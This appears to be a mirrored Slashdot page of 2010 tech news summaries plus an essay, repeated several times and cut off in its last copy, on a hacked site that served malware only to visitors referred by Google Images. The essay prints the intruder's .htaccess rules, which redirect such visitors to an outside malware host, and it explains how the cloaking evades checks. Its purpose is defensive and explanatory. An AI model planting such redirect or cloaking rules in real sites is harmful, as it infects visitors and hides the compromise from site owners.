Slashdot Mirror

grimwell sends in the news that after Cryptome's little run-in with Microsoft and NetSol, the activist site has now had its funds frozen by PayPal. Cryptome founder John Young notes, "Google lists thousands of instances of this asymmetrical high-handedness." "We have reviewed your PayPal Account, and due to the excessive risk involved, we would like to begin parting ways in a manner that is least disruptive to your business."

krou writes "ReadWriteWeb is covering Google's embrace of a system that would enable any Web publisher to 'automatically submit new content to Google for indexing within seconds of that content being published.' Google's Brett Slatkin is lead developer of PuSH, or PubSubHubbub, a real-time syndication protocol based on ATOM, where 'a publisher tells the world about a Hub that it will notify every time new content is published.' Subscribers then wait for the hub to notify them of the new content. Says RWW: 'If Google can implement an Indexing by PuSH program, it would ask every website to implement the technology and declare which Hub they push to at the top of each document, just like they declare where the RSS feeds they publish can be found. Then Google would subscribe to those PuSH feeds to discover new content when it's published. PuSH wouldn't likely replace crawling, in fact a crawl would be needed to discover PuSH feeds to subscribe to, but the real-time format would be used to augment Google's existing index.' PuSH is an open protocol, and Slatkin says that 'I am being told by my engineering bosses to openly promote this open approach even to our competitors.'"

Churam writes "The Israeli military had to cancel an operation (translated from the original French) because a soldier had given some operational details on Facebook. From the article: 'An artillery soldier who was involved in this operation — the arrest of Palestinian suspects — Facebook announced on the imminence of it. "Wednesday, we're cleaning Katana and Thursday, God willing We return to the house," wrote the soldier on his Facebook page, referring to a village near Ramallah.'"

eldavojohn writes "Years after you thought it was all over, Groklaw is reporting that Darl McBride (ex-CEO of SCO) has formed a new company that is buying SCO's mobile business for peanuts — but he's also going to get 'certain Intellectual Property' with the deal. You may recall that McBride was the brains behind the Linux lawsuits that SCO launched and it appears he may be orchestrating an exit route where he escapes with some IP intact, in order to wreak havoc once again. Hopefully this is the part at the end of the movie where the zombie comes back to life one last time only to have the hero deliver the final final blow. When this news broke upon the investment world, SCO's stock skyrocketed a blistering 11%, bringing it up seven cents to a full seventy cents — a level which it has not achieved since 2007."

medea and several other readers noted that the LHC came back online early this morning. Here is the tweet from CERN announcing the milestone. As we discussed a few weeks ago, CERN plans to run the LHC at half power or less through 2011.

upto0013 notes the latest spot of trouble for Google in Europe: the EU says that Google's Street View images violate privacy laws. The EU's privacy watchdog asked Google to notify cities and towns before photographing (Google says it does this already) and to delete original photos after 6 months (Google keeps them for a year and says it has reason to do so). "[T]he privacy official] said that the company should revise its 'disproportionate' policy of keeping the original unblurred images for up to a year, saying improvements in Google's blurring technology and better public awareness would lead to fewer complaints — and a shorter delay for people to react to the photos they see on the site. Complaints about the images put online would usually be checked against the original photos."

An anonymous reader writes "Over the last two months I ported Quake 3 to Android as a hobby project. It only took a few days to get the game working. More time was spent on tweaking the game experience. Right now the game runs at 25fps on a Motorola Milestone/Droid. 'Normally when you compile C/C++ code using the Android NDK, the compiler targets a generic ARMv5 CPU which uses software floating-point. Without any optimizations and audio Quake 3 runs at 22fps. Since Quake 3 uses a lot of floating-point calculations, I tried a better C-compiler (GCC 4.4.0 from Android GIT) which supports modern CPUs and Neon SIMD instructions. Quake 3 optimized for Cortex-A8 with Neon is about 15% faster without audio and 35% with audio compared to the generic ARMv5 build. Most likely the performance improvement compared to the ARMv5 build is not that big because the system libraries of the Milestone have been compiled with FPU support, so sin/cos/log/.. take advantage of the FPU.''

eldavojohn writes "Following the infamous attacks allegedly carried out by the Chinese government, Google sent a strongly worded message to China. However, despite the show of plumage, Google.cn continues to operate filtered. While both parties are silent about any resolution, Google and China have planned to restart talks and negotiations over Google operating unfiltered in China. (If you have a subscription, you can read about the story from its original source, the Wall Street Journal.) The print edition of the WSJ names Google policy executive Ross LaJeunesse as their representative meeting with Chinese officials. Meanwhile, China's Foreign Ministry spokesman, Qin Gang, has officially rejected the claim that the attacks were sanctioned by the Chinese government. He said, 'Google's statement from January 12 is groundless, and we are firmly opposed to it. China administers its internet according to law, and this position will not change. China prohibits hacking and will crack down on hacking according to law.'"

theodp writes "When it comes to Amazon CEO Jeff Bezos' 1-Click patent, the USPTO is an agency that just can't say no. Or yes. It's now been 4+ years since actor Peter Calveley submitted prior art that triggered a USPTO reexamination of the 1-Click patent. Still no 'final answer' from the USPTO, although an Examiner recently issued yet another Final Rejection of 1-Click related claims (pdf), admonishing Amazon for making him 'sift through hundreds of submitted references to identify what applicant allegedly has already submitted,' which he complained is 'adding an undue burden' to his workload. Looks like Bezos' 2000 pledge of 'less work for the overworked Patent and Trademark Office' isn't working out so well in practice. Not too surprising — after all, Amazon did inform Congress that it 'has modified its specific [patent] reform proposals from the year 2000.'"

An anonymous reader writes "The Polish website Moje Jabluszko ran an experiment that proves the poor reliability of the liquid contact indicators (original, in Polish) installed by Apple in the iPhone. They performed three different tests to challenge the LCIs, which they recorded as a movie. They decided to mimic regular usage of the iPhone — meaning, you go outside where it could be cold or warm, then move inside in a building where temperature might be dramatically different, but still within covered conditions. So, they placed the iPhone in its box for one hour outside at -11 C, then moved it inside at room temperature for 24 hours. They repeated the experiment 3 times, and after the third cycle they could show that the LCI located in the audio jack plug started turning red! This is a clear proof that LCIs are not reliable and could turn red while the iPhone has been used under the defined environmental requirements defined by Apple. Here, only the condensing water could have been in contact with the sensor. In other words, even moving in and out during regular winter time will make you iPhone LCI turn red!" (In the tech specs for the iPhone, Apple rates the non-operating temperature range as -20 to 45 C.)

k33l0r writes "Yesterday, the Wikimedia Foundation, which runs Wikipedia and other projects, announced that it has received a $2 million donation from Google. This is the first time that Google has supported Wikipedia, and it has many wondering why. Anyone remember Knol, Google's answer to Wikipedia?"

theodp writes "The Mercury News reports that Google, whose stated mission is to make the world's information universally accessible, says the race and gender of its work force is a trade secret that cannot be released. So do Apple, Yahoo, Oracle, and Applied Materials. The five companies waged a successful 18-month FOIA battle with the Merc, convincing federal regulators who collect the data that its release would cause 'commercial harm' by potentially revealing the companies' business strategy to competitors. Law professor John Sims called the objections — the details of which the Dept. of Labor declined to share — 'absurd.' Many industry peers see the issue differently — Intel, Cisco, eBay, AMD, Sanmina, and Sun agreed to allow the DOL to provide the requested info. 'There's nothing to hide, in our view,' said a spokesman for Intel. Some observers note it's not the first time Google has declined to put a number on its vaunted diversity — in earlier Congressional testimony, Google's top HR exec dodged the question of how many African-American employees the company had."

ub3r n3u7r4l1st writes "A French judge has issued a national arrest warrant for US cyclist Floyd Landis in connection with a case of data hacking at a doping laboratory, a prosecutor's office said. French judge Thomas Cassuto is seeking to question Landis about computer hacking dating back to September 2006 at the Chatenay-Malabry lab, said Astrid Granoux, spokeswoman for Nanterre's prosecutor's office. The laboratory near Paris had uncovered abnormally elevated testosterone levels in Landis' samples collected in the run-up to his 2006 Tour de France victory, leading to the eventual loss of his medal."

Weemz writes "This is the best use of a sausage and technology I have seen today. From the article: 'Too cold to take your gloves off? No problem, try a frozen, individually wrapped Hot Dog. Seoul, Korea; CJ Corporation's "Max Rod" sales are soaring as Koreans have discovered that they are quite effective for operating iPhones in cold weather. Max Rods are individually wrapped, frozen sausages that have replaced the need for an iPhone stylus or iPhone gloves. Once back indoors, this handy stylus becomes a not so light snack! Funnier than watching a subway car of people tapping their iPhones with frozen meat-sticks is reading the Google translation of the original news article.'"

theodp writes "Doc Searls is worried about the way Google makes money. 'Nearly all of it comes from advertising,' he frets. 'That's what pays for all the infrastructure Google is giving to the rest of us. As our dependency on Google verges on the absolute, this should be a concern.' Have we reched Peak Advertising? Blogger Dave Winer says amen, asking if Google is already 'too big to fail.'"

Hugh Pickens writes "Google is set to make a fresh attempt to gain a foothold in the booming social networking business, seeking to counter the growing threat that Facebook poses to some of its core services. USA Today reports that the search giant is upgrading Gmail to add social-media tools similar to those found on Facebook, including photo and video sharing within the Gmail application, along with a new tool for status updates. According to reports, Google is planning to give Gmail users a way to aggregate the updates of their various contacts on the service, creating a stream of notifications that would echo the similar real-time streams from Facebook and Twitter. Google's decision to exploit the heavily-used Gmail service as the basis for its latest assault on the social networking business partly reflects the failure of Google's previous stand-alone efforts to enter the social networking sector. Its Orkut networking service, though launched before Facebook, has failed to gain a mass following in most parts of the world, despite success in Brazil, and its acquisition of Twitter rival Jaiku ended in failure after it scrapped development of the service." Update: 02/09 19:32 GMT by KD : It's been announced as Google Buzz; CNET has a detailed writeup.

CWmike writes "The only smartphone Linus Torvalds doesn't hate is that much less unlikable now that Google has quietly chopped $200 off its early termination fee on the Nexus One. Customers who cancel the service had been on the hook for $550, including a $350 Google cancellation charge. Google has reduced their fee to $150 — but users are still liable for a $200 ETF from T-Mobile. Users have a 14-day grace period during which they do not have to pay either charge, although they may be hit with a restocking fee. The $350 total fee matches one of the highest in the industry, charged by Verizon. Google did not announce the change but simply altered its online terms-of-service document." The price cut could add momentum to a phone that, by one reckoning, costs only $49 unlocked.

Barence writes "Mozilla is ready to exorcise support for Mac OS X 10.4 from Firefox's development code, closing the door on Apple's aging OS. The foundation stopped supporting 10.4, codenamed Tiger, in September 2009, but, according to Josh Aas, a Mozilla platform engineer, 'we left much of the code required to support that platform in the tree in case we wanted to reverse that decision." We had come to a point where we need to make a final decision and either restore 10.4 support or remove this (large) amount of 10.4 specific code,' he notes on the Mozilla developer planning forum."

alphadogg writes "The US Patent and Trademark Office has agreed to review a controversial patent issued in 2001 that is claimed to cover much of the technology underlying VoIP. The patent, held by a small company called C2 Communications Technologies, is one of 10 that the Electronic Frontier Foundation has been trying to strike down for several years through its Patent Busting Project. On Friday, the patent office granted the EFF's request for a re-examination. The digital civil-liberties organization argued that another applicant had submitted basically some of the same technology to the patent office before C2 did. Patent No. 6,243,373, 'Method and apparatus for implementing a computer network/Internet telephone system,' is credited to David L. Turock as inventor and is owned by C2, previously called Acceris Communications Technologies."

Slashdot frequent contributor Bennett Haselton writes "Sites that have been hacked by malware writers are now serving infected content only when the visitor views the site through a frame on Google Images. This recent twist on a standard trick used by malware writers, makes it harder for webmasters and hosting companies to discover that their sites have been infected. Automated tools that check websites for infections and training procedures for hosting company abuse-department staffers will have to be updated accordingly." Read on for the rest of Bennett's thoughts.

A friend of mine recently e-mailed a discussion list with an interesting query. Stonewall Ballard had searched on "tradingbloxlogo" on Google Images, which led to the results on this page. Clicking on the first result, an image from the tradingblox.com site, took him to this page, with the Google information header at the top, and loading the http://www.tradingblox.com/tradingblox/courses.htm page in a frame in the bottom half of the browser window. When that page was loaded in that bottom frame, Internet Explorer and Firefox would both flash warnings about the page being infected with malware. But if you loaded the http://www.tradingblox.com/tradingblox/courses.htm page in a normal Web browser window by itself, the browser would not display any warning, and checking the site using Google's malware query form returned a result saying the site was not suspicious. Why the differing results?

It turned out that the tradingblox.com had been hacked, and pages had been installed onto the server that would serve malware in an unusual way: If the page was being viewed in a frame loaded from Google Images, or as as result of a click through from Google Images, then the page would serve content that attempted to infect the user's computer with malware. On the other hand, if the page was viewed normally (as a result of typing the page into your browser), the malware-loading code would not be served. That means if you were to telnet to port 80 on the www.tradingblox.com server, and request a page as follows:

GET /tradingblox/courses.htm HTTP/1.1
Host: www.tradingblox.com

then the normal page would be returned. But if you entered these commands:

GET /tradingblox/courses.htm HTTP/1.1
Host: www.tradingblox.com
Referer: http://images.google.com/

then you would get the malware-infected page. (The webmaster has since fixed the problem, so that the latter request will no longer get the malware code.) The webserver would only serve the infected content if "images.google.com" was sent specifically as the referrer; "www.google.com" by itself would not trigger the result.

(For the uninitiated, when you click a link from one page to another, for example if you were reading an article on CNN.com which had a link to http://www.google.com/support/ and you clicked on that link, then when your browser requested the file "/support/" from the www.google.com server, it would send the request as follows:

GET /support/ HTTP/1.1
Host: www.google.com
Referer: http://www.cnn.com/article.url.goes.here/

So the webmasters of www.google.com can see what links people are clicking from other websites to reach the www.google.com site. Many sites use this to track which links from other pages, including advertisements that they've bought on other sites, are sending them the most traffic.)

Denis Sinegubko, owner of the website malware-infection checking site UnmaskParasites.com, says that he had seen pages before which would serve infected content if www.google.com itself were listed in the Referer: field. However, this was the first instance he'd seen where the content was only served if images.google.com was specifically listed as the Referer. Since no malware distributor would manually break into just one website to compromise it in this exact manner, it's extremely likely that there are many more sites that are infected in the same way. Stonewall Ballard noted that the Google Safe Browsing lookup for the hosting company where tradingblox.com is hosted, showed a high number of other sites on the same network that had been infected recently. (And those are only the infected sites that Google knows about -- recall that Google didn't even know that tradingblox.com was infected.)

Obviously, from the malware author's point of view, the point of serving malware content only some of the time rather than all of the time, is to make it harder for webmasters to pinpoint the problem. Someone gets the malware warning after following a link or loading a page via Google Images, and sends the webmaster an e-mail saying, "I got infected by your webpage, here is the link." The webmaster views the link and says, "I don't know what you're talking about, there's no malware code on that page." It also makes it harder for automated site-checking tools to detect the infection. Google's Safe Browsing lookup tool reported the site as uninfected, and Sinegubko's site-checking tool on UnmaskParasites.com also reported no malware infections on tradingblox.com, even while the site was still infected. (Sinegubko said he would possibly modify his site-checking script so that in addition to the other checks it performs, it will attempt to request a page sending "http://images.google.com/" in the "Referer:" field, to see if that results in different content being served. Google's Safe Browsing spider should do the same.)

Sinegubko said he's also seen instances where hacked sites would cover their tracks even further, by refusing to display infected content if the Referer: link from Google contained "inurl:domainname.com" or "site:domainname.com". This is because webmasters would sometimes check if their site was serving infected content in response to a click from Google, by doing a Google search on their own domainname.com, and following the link back to their site. By not serving the infected content in that case, the malware infection becomes even harder to detect.

This also makes it harder to report the exploits to the hosting companies that host infected websites. In case the webmaster of the infected site doesn't respond to complaints that their site is infected, sometimes you have to contact the hosting company and ask them to forcibly take the website offline until the problem is fixed. And I have been hosted by several companies where the tech support and abuse departments were (just barely) competent enough that if I called them up and said, "Your customer is hosting a malware-infected webpage, go to this page and view the source code, and you can see the malicious code", they would have known what to do. But if I'd had to tell them to follow the steps above -- "telnet to port 80" on the infected website, and type a few lines to mimic the process of a browser sending HTTP request headers to the website -- I probably would have lost them at "telnet". (Recall an experiment wherein I e-mailed some hosting companies from a Hotmail account, asking them to change the nameservers for a domain that I had hosted with them, and about half of the hosting companies agreed to switch the domain nameservers -- essentially, transferring the entire website to an unknown third party -- without ever authenticating that it was really me writing from that Hotmail account. Which means anybody could have taken over those websites simply by sending an e-mail. Front-end tech support at cheap hosting companies is often not very smart.)

Fortunately, Tim Arnold, the webmaster of the tradingblox.com site, did respond to the original report about the malware-infected pages, and found that an intruder had hacked the site on November 30th and inserted these lines into an .htaccess file:

RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*images.google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*images.search.yahoo.*$ [NC]
RewriteRule .* http://search-box.in/in.cgi?4&parameter=u [R,L]
<Files 403.shtml>
order allow,deny
allow from all
</Files>

which resulted in the infected pages being served whenever a user loaded the site via Google Images. (So if you found this article because you think your own site might be infected by malware that serves pages conditionally on the Referer: field, that's the first place to look to fix the problem!)

It's uncertain how Arnold's site got infected in the first place, but Sinegubko had earlier said that almost 90% of breakins in 2009 that occurred on Linux-hosted sites, were caused by malware installed surreptitiously on people's Windows PCs and stealing the passwords that people used to administer their sites. Or the site could have been compromised via a WordPress exploit such as this one. As I always tell anyone who will listen, if you want to keep your Linux-hosted website from being broken into, one of the most frequently overlooked precautions that you need to take is to keep your Windows PC free of spyware.

But the larger point is that as malware becomes more aggressive, it's not just going to become harder to keep your PC and websites uninfected. It's also going to become harder for site owners and for hosting company abuse departments to verify that a site has been hacked, as the hacks use more sophisticated techniques to prevent the infection from being discovered. Abuse report handlers will have to be trained to understand what it means that a website is only showing infected content as a result of a "Referer:" header, and ideally should know enough about networking and command-line tools, to be able to mimic the "telnet" instructions above. (Most expensive dedicated hosting companies like RackSpace, do have technical staff who are at least that knowledgeable. But cheap shared hosting companies -- the kind where you can get your domain transferred to another company by sending an e-mail from an unauthenticated Hotmail account -- will have to train their abuse staff better.) Automated site-checking tools like Google's Safe Browsing spider and UnmaskParasites.com's site checker will have to start taking these attacks into account when checking a site for infection.

And as always, keeping your PC free of spyware, shouldn't be viewed just as a convenience to yourself, but as an obligation to your neighbors as well. (A case of the positive/negative externalities problem in economics.) You wouldn't send your kid to school with the flu, so why did you get your Mom on the Internet without buying her some anti-virus software?

Slashdot frequent contributor Bennett Haselton writes "Sites that have been hacked by malware writers are now serving infected content only when the visitor views the site through a frame on Google Images. This recent twist on a standard trick used by malware writers, makes it harder for webmasters and hosting companies to discover that their sites have been infected. Automated tools that check websites for infections and training procedures for hosting company abuse-department staffers will have to be updated accordingly." Read on for the rest of Bennett's thoughts.

A friend of mine recently e-mailed a discussion list with an interesting query. Stonewall Ballard had searched on "tradingbloxlogo" on Google Images, which led to the results on this page. Clicking on the first result, an image from the tradingblox.com site, took him to this page, with the Google information header at the top, and loading the http://www.tradingblox.com/tradingblox/courses.htm page in a frame in the bottom half of the browser window. When that page was loaded in that bottom frame, Internet Explorer and Firefox would both flash warnings about the page being infected with malware. But if you loaded the http://www.tradingblox.com/tradingblox/courses.htm page in a normal Web browser window by itself, the browser would not display any warning, and checking the site using Google's malware query form returned a result saying the site was not suspicious. Why the differing results?

It turned out that the tradingblox.com had been hacked, and pages had been installed onto the server that would serve malware in an unusual way: If the page was being viewed in a frame loaded from Google Images, or as as result of a click through from Google Images, then the page would serve content that attempted to infect the user's computer with malware. On the other hand, if the page was viewed normally (as a result of typing the page into your browser), the malware-loading code would not be served. That means if you were to telnet to port 80 on the www.tradingblox.com server, and request a page as follows:

GET /tradingblox/courses.htm HTTP/1.1
Host: www.tradingblox.com

then the normal page would be returned. But if you entered these commands:

GET /tradingblox/courses.htm HTTP/1.1
Host: www.tradingblox.com
Referer: http://images.google.com/

then you would get the malware-infected page. (The webmaster has since fixed the problem, so that the latter request will no longer get the malware code.) The webserver would only serve the infected content if "images.google.com" was sent specifically as the referrer; "www.google.com" by itself would not trigger the result.

(For the uninitiated, when you click a link from one page to another, for example if you were reading an article on CNN.com which had a link to http://www.google.com/support/ and you clicked on that link, then when your browser requested the file "/support/" from the www.google.com server, it would send the request as follows:

GET /support/ HTTP/1.1
Host: www.google.com
Referer: http://www.cnn.com/article.url.goes.here/

So the webmasters of www.google.com can see what links people are clicking from other websites to reach the www.google.com site. Many sites use this to track which links from other pages, including advertisements that they've bought on other sites, are sending them the most traffic.)

Denis Sinegubko, owner of the website malware-infection checking site UnmaskParasites.com, says that he had seen pages before which would serve infected content if www.google.com itself were listed in the Referer: field. However, this was the first instance he'd seen where the content was only served if images.google.com was specifically listed as the Referer. Since no malware distributor would manually break into just one website to compromise it in this exact manner, it's extremely likely that there are many more sites that are infected in the same way. Stonewall Ballard noted that the Google Safe Browsing lookup for the hosting company where tradingblox.com is hosted, showed a high number of other sites on the same network that had been infected recently. (And those are only the infected sites that Google knows about -- recall that Google didn't even know that tradingblox.com was infected.)

Obviously, from the malware author's point of view, the point of serving malware content only some of the time rather than all of the time, is to make it harder for webmasters to pinpoint the problem. Someone gets the malware warning after following a link or loading a page via Google Images, and sends the webmaster an e-mail saying, "I got infected by your webpage, here is the link." The webmaster views the link and says, "I don't know what you're talking about, there's no malware code on that page." It also makes it harder for automated site-checking tools to detect the infection. Google's Safe Browsing lookup tool reported the site as uninfected, and Sinegubko's site-checking tool on UnmaskParasites.com also reported no malware infections on tradingblox.com, even while the site was still infected. (Sinegubko said he would possibly modify his site-checking script so that in addition to the other checks it performs, it will attempt to request a page sending "http://images.google.com/" in the "Referer:" field, to see if that results in different content being served. Google's Safe Browsing spider should do the same.)

Sinegubko said he's also seen instances where hacked sites would cover their tracks even further, by refusing to display infected content if the Referer: link from Google contained "inurl:domainname.com" or "site:domainname.com". This is because webmasters would sometimes check if their site was serving infected content in response to a click from Google, by doing a Google search on their own domainname.com, and following the link back to their site. By not serving the infected content in that case, the malware infection becomes even harder to detect.

This also makes it harder to report the exploits to the hosting companies that host infected websites. In case the webmaster of the infected site doesn't respond to complaints that their site is infected, sometimes you have to contact the hosting company and ask them to forcibly take the website offline until the problem is fixed. And I have been hosted by several companies where the tech support and abuse departments were (just barely) competent enough that if I called them up and said, "Your customer is hosting a malware-infected webpage, go to this page and view the source code, and you can see the malicious code", they would have known what to do. But if I'd had to tell them to follow the steps above -- "telnet to port 80" on the infected website, and type a few lines to mimic the process of a browser sending HTTP request headers to the website -- I probably would have lost them at "telnet". (Recall an experiment wherein I e-mailed some hosting companies from a Hotmail account, asking them to change the nameservers for a domain that I had hosted with them, and about half of the hosting companies agreed to switch the domain nameservers -- essentially, transferring the entire website to an unknown third party -- without ever authenticating that it was really me writing from that Hotmail account. Which means anybody could have taken over those websites simply by sending an e-mail. Front-end tech support at cheap hosting companies is often not very smart.)

Fortunately, Tim Arnold, the webmaster of the tradingblox.com site, did respond to the original report about the malware-infected pages, and found that an intruder had hacked the site on November 30th and inserted these lines into an .htaccess file:

RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*images.google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*images.search.yahoo.*$ [NC]
RewriteRule .* http://search-box.in/in.cgi?4&parameter=u [R,L]
<Files 403.shtml>
order allow,deny
allow from all
</Files>

which resulted in the infected pages being served whenever a user loaded the site via Google Images. (So if you found this article because you think your own site might be infected by malware that serves pages conditionally on the Referer: field, that's the first place to look to fix the problem!)

It's uncertain how Arnold's site got infected in the first place, but Sinegubko had earlier said that almost 90% of breakins in 2009 that occurred on Linux-hosted sites, were caused by malware installed surreptitiously on people's Windows PCs and stealing the passwords that people used to administer their sites. Or the site could have been compromised via a WordPress exploit such as this one. As I always tell anyone who will listen, if you want to keep your Linux-hosted website from being broken into, one of the most frequently overlooked precautions that you need to take is to keep your Windows PC free of spyware.

But the larger point is that as malware becomes more aggressive, it's not just going to become harder to keep your PC and websites uninfected. It's also going to become harder for site owners and for hosting company abuse departments to verify that a site has been hacked, as the hacks use more sophisticated techniques to prevent the infection from being discovered. Abuse report handlers will have to be trained to understand what it means that a website is only showing infected content as a result of a "Referer:" header, and ideally should know enough about networking and command-line tools, to be able to mimic the "telnet" instructions above. (Most expensive dedicated hosting companies like RackSpace, do have technical staff who are at least that knowledgeable. But cheap shared hosting companies -- the kind where you can get your domain transferred to another company by sending an e-mail from an unauthenticated Hotmail account -- will have to train their abuse staff better.) Automated site-checking tools like Google's Safe Browsing spider and UnmaskParasites.com's site checker will have to start taking these attacks into account when checking a site for infection.

And as always, keeping your PC free of spyware, shouldn't be viewed just as a convenience to yourself, but as an obligation to your neighbors as well. (A case of the positive/negative externalities problem in economics.) You wouldn't send your kid to school with the flu, so why did you get your Mom on the Internet without buying her some anti-virus software?

Slashdot frequent contributor Bennett Haselton writes "Sites that have been hacked by malware writers are now serving infected content only when the visitor views the site through a frame on Google Images. This recent twist on a standard trick used by malware writers, makes it harder for webmasters and hosting companies to discover that their sites have been infected. Automated tools that check websites for infections and training procedures for hosting company abuse-department staffers will have to be updated accordingly." Read on for the rest of Bennett's thoughts.

A friend of mine recently e-mailed a discussion list with an interesting query. Stonewall Ballard had searched on "tradingbloxlogo" on Google Images, which led to the results on this page. Clicking on the first result, an image from the tradingblox.com site, took him to this page, with the Google information header at the top, and loading the http://www.tradingblox.com/tradingblox/courses.htm page in a frame in the bottom half of the browser window. When that page was loaded in that bottom frame, Internet Explorer and Firefox would both flash warnings about the page being infected with malware. But if you loaded the http://www.tradingblox.com/tradingblox/courses.htm page in a normal Web browser window by itself, the browser would not display any warning, and checking the site using Google's malware query form returned a result saying the site was not suspicious. Why the differing results?

It turned out that the tradingblox.com had been hacked, and pages had been installed onto the server that would serve malware in an unusual way: If the page was being viewed in a frame loaded from Google Images, or as as result of a click through from Google Images, then the page would serve content that attempted to infect the user's computer with malware. On the other hand, if the page was viewed normally (as a result of typing the page into your browser), the malware-loading code would not be served. That means if you were to telnet to port 80 on the www.tradingblox.com server, and request a page as follows:

GET /tradingblox/courses.htm HTTP/1.1
Host: www.tradingblox.com

then the normal page would be returned. But if you entered these commands:

GET /tradingblox/courses.htm HTTP/1.1
Host: www.tradingblox.com
Referer: http://images.google.com/

then you would get the malware-infected page. (The webmaster has since fixed the problem, so that the latter request will no longer get the malware code.) The webserver would only serve the infected content if "images.google.com" was sent specifically as the referrer; "www.google.com" by itself would not trigger the result.

(For the uninitiated, when you click a link from one page to another, for example if you were reading an article on CNN.com which had a link to http://www.google.com/support/ and you clicked on that link, then when your browser requested the file "/support/" from the www.google.com server, it would send the request as follows:

GET /support/ HTTP/1.1
Host: www.google.com
Referer: http://www.cnn.com/article.url.goes.here/

So the webmasters of www.google.com can see what links people are clicking from other websites to reach the www.google.com site. Many sites use this to track which links from other pages, including advertisements that they've bought on other sites, are sending them the most traffic.)

Denis Sinegubko, owner of the website malware-infection checking site UnmaskParasites.com, says that he had seen pages before which would serve infected content if www.google.com itself were listed in the Referer: field. However, this was the first instance he'd seen where the content was only served if images.google.com was specifically listed as the Referer. Since no malware distributor would manually break into just one website to compromise it in this exact manner, it's extremely likely that there are many more sites that are infected in the same way. Stonewall Ballard noted that the Google Safe Browsing lookup for the hosting company where tradingblox.com is hosted, showed a high number of other sites on the same network that had been infected recently. (And those are only the infected sites that Google knows about -- recall that Google didn't even know that tradingblox.com was infected.)

Obviously, from the malware author's point of view, the point of serving malware content only some of the time rather than all of the time, is to make it harder for webmasters to pinpoint the problem. Someone gets the malware warning after following a link or loading a page via Google Images, and sends the webmaster an e-mail saying, "I got infected by your webpage, here is the link." The webmaster views the link and says, "I don't know what you're talking about, there's no malware code on that page." It also makes it harder for automated site-checking tools to detect the infection. Google's Safe Browsing lookup tool reported the site as uninfected, and Sinegubko's site-checking tool on UnmaskParasites.com also reported no malware infections on tradingblox.com, even while the site was still infected. (Sinegubko said he would possibly modify his site-checking script so that in addition to the other checks it performs, it will attempt to request a page sending "http://images.google.com/" in the "Referer:" field, to see if that results in different content being served. Google's Safe Browsing spider should do the same.)

Sinegubko said he's also seen instances where hacked sites would cover their tracks even further, by refusing to display infected content if the Referer: link from Google contained "inurl:domainname.com" or "site:domainname.com". This is because webmasters would sometimes check if their site was serving infected content in response to a click from Google, by doing a Google search on their own domainname.com, and following the link back to their site. By not serving the infected content in that case, the malware infection becomes even harder to detect.

This also makes it harder to report the exploits to the hosting companies that host infected websites. In case the webmaster of the infected site doesn't respond to complaints that their site is infected, sometimes you have to contact the hosting company and ask them to forcibly take the website offline until the problem is fixed. And I have been hosted by several companies where the tech support and abuse departments were (just barely) competent enough that if I called them up and said, "Your customer is hosting a malware-infected webpage, go to this page and view the source code, and you can see the malicious code", they would have known what to do. But if I'd had to tell them to follow the steps above -- "telnet to port 80" on the infected website, and type a few lines to mimic the process of a browser sending HTTP request headers to the website -- I probably would have lost them at "telnet". (Recall an experiment wherein I e-mailed some hosting companies from a Hotmail account, asking them to change the nameservers for a domain that I had hosted with them, and about half of the hosting companies agreed to switch the domain nameservers -- essentially, transferring the entire website to an unknown third party -- without ever authenticating that it was really me writing from that Hotmail account. Which means anybody could have taken over those websites simply by sending an e-mail. Front-end tech support at cheap hosting companies is often not very smart.)

Fortunately, Tim Arnold, the webmaster of the tradingblox.com site, did respond to the original report about the malware-infected pages, and found that an intruder had hacked the site on November 30th and inserted these lines into an .htaccess file:

RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*images.google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*images.search.yahoo.*$ [NC]
RewriteRule .* http://search-box.in/in.cgi?4&parameter=u [R,L]
<Files 403.shtml>
order allow,deny
allow from all
</Files>

which resulted in the infected pages being served whenever a user loaded the site via Google Images. (So if you found this article because you think your own site might be infected by malware that serves pages conditionally on the Referer: field, that's the first place to look to fix the problem!)

It's uncertain how Arnold's site got infected in the first place, but Sinegubko had earlier said that almost 90% of breakins in 2009 that occurred on Linux-hosted sites, were caused by malware installed surreptitiously on people's Windows PCs and stealing the passwords that people used to administer their sites. Or the site could have been compromised via a WordPress exploit such as this one. As I always tell anyone who will listen, if you want to keep your Linux-hosted website from being broken into, one of the most frequently overlooked precautions that you need to take is to keep your Windows PC free of spyware.

But the larger point is that as malware becomes more aggressive, it's not just going to become harder to keep your PC and websites uninfected. It's also going to become harder for site owners and for hosting company abuse departments to verify that a site has been hacked, as the hacks use more sophisticated techniques to prevent the infection from being discovered. Abuse report handlers will have to be trained to understand what it means that a website is only showing infected content as a result of a "Referer:" header, and ideally should know enough about networking and command-line tools, to be able to mimic the "telnet" instructions above. (Most expensive dedicated hosting companies like RackSpace, do have technical staff who are at least that knowledgeable. But cheap shared hosting companies -- the kind where you can get your domain transferred to another company by sending an e-mail from an unauthenticated Hotmail account -- will have to train their abuse staff better.) Automated site-checking tools like Google's Safe Browsing spider and UnmaskParasites.com's site checker will have to start taking these attacks into account when checking a site for infection.

And as always, keeping your PC free of spyware, shouldn't be viewed just as a convenience to yourself, but as an obligation to your neighbors as well. (A case of the positive/negative externalities problem in economics.) You wouldn't send your kid to school with the flu, so why did you get your Mom on the Internet without buying her some anti-virus software?

Slashdot frequent contributor Bennett Haselton writes "Sites that have been hacked by malware writers are now serving infected content only when the visitor views the site through a frame on Google Images. This recent twist on a standard trick used by malware writers, makes it harder for webmasters and hosting companies to discover that their sites have been infected. Automated tools that check websites for infections and training procedures for hosting company abuse-department staffers will have to be updated accordingly." Read on for the rest of Bennett's thoughts.

A friend of mine recently e-mailed a discussion list with an interesting query. Stonewall Ballard had searched on "tradingbloxlogo" on Google Images, which led to the results on this page. Clicking on the first result, an image from the tradingblox.com site, took him to this page, with the Google information header at the top, and loading the http://www.tradingblox.com/tradingblox/courses.htm page in a frame in the bottom half of the browser window. When that page was loaded in that bottom frame, Internet Explorer and Firefox would both flash warnings about the page being infected with malware. But if you loaded the http://www.tradingblox.com/tradingblox/courses.htm page in a normal Web browser window by itself, the browser would not display any warning, and checking the site using Google's malware query form returned a result saying the site was not suspicious. Why the differing results?

